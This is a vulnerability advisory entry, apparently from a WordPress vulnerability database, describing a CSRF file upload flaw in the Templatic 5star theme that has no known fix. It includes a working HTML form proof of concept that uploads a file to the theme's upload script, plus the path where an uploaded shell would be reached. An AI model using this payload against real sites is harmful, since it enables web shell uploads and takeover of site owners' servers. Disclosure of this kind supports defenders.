Themes Vulnerabilities
5star by Templatic - CSRF File Upload
Description
The 5star WordPress theme was affected by a Templatic Theme CSRF File Upload security vulnerability.
Proof of Concept
<html> <body> <center> <form method="post" enctype="multipart/form-data" action="https://example.com/wp-content/themes/5star/Monetize/general/upload-file.php"> <input name="uploadfile[]" type="file" /> <input type="submit" value="upload" /> </form> </center> </body> </html> File Access: https://example.com/wp-content/themes/5star/images/tmp/your_shell.php
Affects Themes
No known fix
References
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Jje Incovers
Verified
No
WPVDB ID
Timeline
Publicly Published
2014-08-01 (about 9 years ago)
Added
2014-08-01 (about 9 years ago)
Last Updated
2021-01-13 (about 3 years ago)